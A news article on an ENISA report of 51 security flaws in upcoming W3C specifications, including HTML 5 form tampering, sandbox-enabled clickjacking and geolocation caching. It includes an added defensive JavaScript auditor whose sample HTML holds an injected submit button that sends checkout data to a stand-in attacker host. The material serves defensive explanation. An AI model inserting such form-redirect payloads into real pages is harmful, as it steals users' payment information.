Emerging web standards have over 50 security design flaws, many of which could allow an attacker to steal information, the EU's security agency has warned.
During year-long research, the European Network Information Security Agency (Enisa) discovered 51 vulnerabilities in 13 upcoming World Wide Web Consortium (W3C) standards and specifications, the agency said in a report on Monday. Among these were issues with the HTML 5 standard, which is being used by Microsoft, Adobe and others in their latest web browsers.
"They're not rootkit-type vulnerabilities, they're more likely to allow an attacker to control a browser context," Giles Hogben, a network security expert at Enisa, told ZDNet UK. "For example, a dodgy page could get information from a legitimate page."
Using the flaws, an attacker could trick people into installing malware to give the hacker remote control of their system, he added. Many could allow a criminal to steal information using form submission and cross-domain requests, according to Enisa.
In HTML 5, one of the serious design vulnerabilities opens the door to form-tampering through HTML injection. In one scenario, a person buying goods online enters a credit card number and other information into a web form. HTML 5 allows buttons, such as a submit button, to exist outside a web form. With the design flaw, an attacker could trick the buyer into sending the financial information to an unintended destination using a malicious button.
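As an added example (not from the Enisa report or this article), a defender-side check for the form-tampering pattern described above: it flags any submit button that binds to a form through the HTML 5 `form` attribute but overrides the destination with a `formaction` on a different origin than the form's own `action`. The form id, URLs and HTML snippet are constructed for the example.

```javascript
// Parse one tag body ('type="submit" form="checkout"') into an attribute object.
// Only double-quoted values are handled: enough for the constructed sample below.
function parseAttrs(raw) {
  const attrs = {};
  const re = /([\w-]+)\s*=\s*"([^"]*)"/g;
  let m;
  while ((m = re.exec(raw)) !== null) attrs[m[1].toLowerCase()] = m[2];
  return attrs;
}

// Collect <form>, <button> and <input> start tags as flat {name, attrs} records.
// Minimal regex sketch for the sample; on a live page walk the DOM instead.
function collectTags(html) {
  const tags = [];
  const re = /<(form|button|input)\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(html)) !== null) tags.push({ name: m[1].toLowerCase(), attrs: parseAttrs(m[2]) });
  return tags;
}

// Flag submit controls bound to a form via form="id" whose formaction resolves to a
// different origin than the form's own action. Returns one finding per such control.
function auditFormTargets(html, pageUrl) {
  const tags = collectTags(html);
  const forms = new Map();
  for (const t of tags) if (t.name === "form" && t.attrs.id) forms.set(t.attrs.id, t.attrs);
  const findings = [];
  for (const t of tags) {
    if (t.name === "form" || !t.attrs.form) continue;            // only detached, form-bound controls
    const type = (t.attrs.type || (t.name === "button" ? "submit" : "text")).toLowerCase();
    if (type !== "submit" && type !== "image") continue;          // only controls that submit
    const form = forms.get(t.attrs.form);
    if (!form || !t.attrs.formaction) continue;                   // no destination override
    const formTarget = new URL(form.action || "", pageUrl);       // form's declared destination
    const buttonTarget = new URL(t.attrs.formaction, pageUrl);    // button's override
    if (buttonTarget.origin !== formTarget.origin) {
      findings.push({ form: t.attrs.form, expected: formTarget.origin, target: buttonTarget.href });
    }
  }
  return findings;
}

// Constructed sample (hypothetical URLs): a checkout form, one legitimate detached
// button bound with form=, and one injected button that redirects the submission.
const SAMPLE_HTML = `
<form id="checkout" action="/pay" method="post"><input name="card" type="text"></form>
<button type="submit" form="checkout">Pay now</button>
<button type="submit" form="checkout" formaction="https://attacker.example/collect">Pay now</button>`;
console.log(auditFormTargets(SAMPLE_HTML, "https://shop.example/checkout"));
```

On a live page the same comparison can be run over `document.querySelectorAll('[form]')` instead of the regex sketch; a Content-Security-Policy `form-action` directive additionally limits where any form on the page may submit, whatever markup is injected.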
Another possible attack outlined by Enisa turns a browser security feature — a sandbox — into a method of subverting HTML 5 security. Putting websites into a sandbox prevents them from accessing the system via the browser. However, the attack described by Enisa uses the sandbox to disable protection against clickjacking. In clickjacking, a user is fooled into clicking on a seemingly innocuous web object such as a button, which then reveals confidential information.
The HTML 5 specification allows a hacker to put a malicious page inside a sandboxed iframe, disabling top-level navigation; because frame-busting scripts defend against clickjacking by navigating the top-level window away from a hostile frame, the sandbox neutralises that defence and leaves the user open to clickjacking.
Another flaw highlighted by Enisa, in the Geoloc-Secure-3 cache API specification, lets a hacker retrieve information about the user's location from the cache. In addition, the specification fails to set an upper limit to how long geolocation data is stored in the cache, leaving people open to attacks that give away their movements.
The W3C has time to change some of the standards, but some may not be reworked to mitigate the flaws completely, according to Hogben. For example, the consortium is unlikely to fully mitigate the HTML 5 form-filling threat through the standard, he said.
"Some of the flaws we don't expect to be [fully] fixed... especially the one about the forms, as the functionality should be in there for a reason," said Hogben. "We don't expect W3C to take the forms functionality out of the spec."
The standards have been in development for varying lengths of time, and Enisa has submitted its report to the W3C in time for its working groups to consider the findings before finalising the standards.
"We have worked with Enisa in preparing this review to ensure that it is relevant and timely to the standards work that is going on. What you are seeing here is the security review process functioning as it should: Independent review identifies possible security issues; the relevant Working Groups then analyse and address the issues raised," the W3C said in a statement.
"The relevant W3C working groups will indeed address these vulnerabilities according to the usual W3C process," it added.